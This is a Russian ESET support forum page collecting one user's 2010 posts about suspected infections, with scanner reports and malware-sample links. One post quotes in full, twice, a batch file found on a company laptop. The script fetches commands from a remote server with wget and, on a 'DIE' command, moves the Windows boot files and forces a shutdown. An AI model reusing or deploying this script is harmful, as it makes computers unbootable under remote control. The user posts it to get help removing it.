Vitokhv (Автор тем) - Форум технической поддержки ESET NOD32

Hosts, validation.sls.microsoft.com

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 19.08.2010 19:16:35

Я так понимаю пользователь заблокировал проверку валидности Windows ?

Изменено: Виктор - 19.08.2010 19:20:36

Перейти

Тупит DC++ подозрение на вирус

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 14.08.2010 16:40:19

При запуске DC++ начинает жутко тормозить ПК..
Еще не работают скрытые файлы и папки, в свойствах папки все включено.
Помогите со скриптом..
Вот лог:

Изменено: Виктор - 14.08.2010 16:49:21

Перейти

Вирус NOTEPAD

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 22.07.2010 06:01:13

Здравствуйте! столкнулся с файлом помеченным Sysinspector-ом, который содержит в себе характеристики вируса, но визуально это обновленный дизайн стандартного блокнота.
В Local Settings\Temp создает файл NOTEPAD.ini

Отчет антивирусного сканера: http://www.virscan.org/report/35faf08d4ea3db24768aaffeac80989e.html
Архив отправил на Dmitry.B

Перейти

Блокировка опасных сайтов ()

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 15.07.2010 14:05:48

Прежде чем начать тему, думаю стоит обратить внимание на принцип блокировки - сочетание символов pоrn полностью закроет доступ к ссылкам сайтов (оpenpоrn.net)
Поэтому, кому не столь важны посещения данных сайтов или они случайны, присоединяйтесь.

В настройках находим - "Защита доступа в интернет", "HTTP, HTTPS", "Управление адресами"
В любой момент Вы можете отключить блокирование - убрав галки с опции "Список активизирован"

Так как объем списков не должен превышать 25 Кбайт, создавайте отдельные шаблоны, например:
Угроза заражения 1
Угроза заражения 2
Угроза заражения 3

Перейти

Вирус bwedky.exe

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 15.07.2010 10:29:14

Возможно данный файл прописывает маршруты.
Залил: http://rghost.ru/2125511
Отчет сканера: http://www.virscan.org/report/e9eeb29a2913192e71762d0018a5461e.html

Перейти

Запланированные задания (угроза)

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 11.07.2010 13:39:12

Здравствуйте! объясните пожалуйста смысл файла main.bat который запускается автозагрузкой и включает задачи странного названия.

Были выполнены действия:
1) c:\windows\system32\main.bat удалил файл.
2) Удалил файлы:
c:\windows\tasks\at1.job
c:\windows\tasks\at2.job
c:\windows\tasks\at3.job
c:\windows\tasks\at4.job
c:\windows\tasks\At1.job
c:\windows\tasks\At2.job
c:\windows\tasks\At3.job
c:\windows\tasks\At4.job

route print - чист

Структура bat файла:

Код
@echo off cd c:\windows\system32 :begin echo Searching for IP adress... ipconfig \| grep IP if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto noip :ipfound echo IP address found in ipconfig output echo Pinging RMH.RU ping -n 1 rmh.ru \| grep.exe Ping if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto noreply :inet echo Reply from RMH.RU retrieved echo Empty command echo > command.txt echo Retrieving command from server... wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1 echo Retrieved, checking command type command.txt \| grep STOP if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto end :STOP type command.txt \| grep STOP > nul if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto wcommand :die echo DIE command retrieved echo Moving boot.ini, ntdetect.com, ntldr move /y c:\boot.ini c:\windows move /y c:\ntdetect.com c:\windows move /y c:\ntldr c:\windows echo Shuting down shutdown -s -f -t 0 -c "Computer must be returned" goto end :noip echo IP address not found in ipconfig output goto end :noreply echo No reply from RMH.RU goto end :wcommand echo Wrong command retrieved. Typing command: echo --- type command.txt echo --- goto end :error echo Grep error goto end :end

Код

@echo off
cd c:\windows\system32
:begin
echo Searching for IP adress...
ipconfig | grep IP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noip

:ipfound
echo IP address found in ipconfig output
echo Pinging RMH.RU
ping -n 1 rmh.ru | grep.exe Ping
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto noreply

:inet
echo Reply from RMH.RU retrieved
echo Empty command
echo > command.txt
echo Retrieving command from server...
wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1
echo Retrieved, checking command
type command.txt | grep STOP
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto end


:STOP
type command.txt | grep STOP > nul
if ERRORLEVEL 2 goto error
if ERRORLEVEL 1 goto wcommand

:die
echo DIE command retrieved
echo Moving boot.ini, ntdetect.com, ntldr

move /y c:\boot.ini c:\windows
move /y c:\ntdetect.com c:\windows
move /y c:\ntldr c:\windows
echo Shuting down
shutdown -s -f -t 0 -c "Computer must be returned"
goto end

:noip
echo IP address not found in ipconfig output
goto end

:noreply
echo No reply from RMH.RU
goto end

:wcommand
echo Wrong command retrieved. Typing command:
echo ---
type command.txt
echo ---
goto end

:error
echo Grep error
goto end

:end

Вопрос такого характера - ноутбук, предоставлен компанией "Ромир", у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту.

Перейти

Вирус Mail-Send.exe

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 04.07.2010 06:34:25

Отправлял на [email protected]

*********

Это письмо отправлено почтовым сервером yandex.ru

К сожалению, мы вынуждены сообщить Вам о том, что Ваше письмо не может
быть отправлено одному или нескольким адресатам. Причины указаны ниже.

Пожалуйста, не отвечайте на это сообщение.

**********

This is the mail system at host yandex.ru

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

Please, do not reply to this message.

<[email protected]>: host gmail-smtp-in.l.google.com[74.125.39.27] said:
552-5.7.0 Our system detected an illegal attachment on your message. Please
552-5.7.0 visit http://mail.google.com/support/bin/answer.py?answer=6590 to
552 5.7.0 review our attachment guidelines. n23si2238470fam.67 (in reply to
end of DATA command)

Перейти

[ Закрыто] Вирус отключил NOD

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 02.07.2010 08:42:51

Номер моего обращения № 279 479

Цитата
Я скачал видео урок, и запустил файл, мне показался подозрительным данный текст - "файл может иногда открываться с задержкой, не спешите закрывать" (для просмотра урока запустите фаил Mail-Send.exe) Dr.Web и Symantec обнаружили троян! Вот отчет сканера: http://www.virscan.org/report/2fb364a9befaf3d7d20f750bc508c26b.html Данный файл скачал с сайта: http://videoypok.ru Отправил файл в архиве с паролем infected

Цитата

Я скачал видео урок, и запустил файл, мне показался подозрительным данный текст - "файл может иногда открываться с задержкой, не спешите закрывать" (для просмотра урока запустите фаил Mail-Send.exe)
Dr.Web и Symantec обнаружили троян!

Вот отчет сканера: http://www.virscan.org/report/2fb364a9befaf3d7d20f750bc508c26b.html
Данный файл скачал с сайта: http://videoypok.ru

Отправил файл в архиве с паролем infected

Оставил негативный отзыв в сторону тех поддержки, в теме "Жалобы"
Давайте решать проблему а не прятаться от своих клиентов!

EAV-31595335

Перейти

Зараженный компьютер, Логи + файлы

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 19.06.2010 17:35:08

Система была заражена. Сохранил те файлы которые SysInspector указал опасными. Отправил архив под именем sys_dll.zip (пароль infected)

Перейти

SysInspector & winhttp.dll

Сообщений: 411

Баллов: 328

Регистрация: 29.05.2010

Размещено 15.06.2010 12:03:14

Ссылка на этот файл определяется как текущая директория "@%SystemRoot%\system32\winhttp.dll,-100"
А должно по идее ссылаться на C:/windows/system32/winhttp.dll

Перейти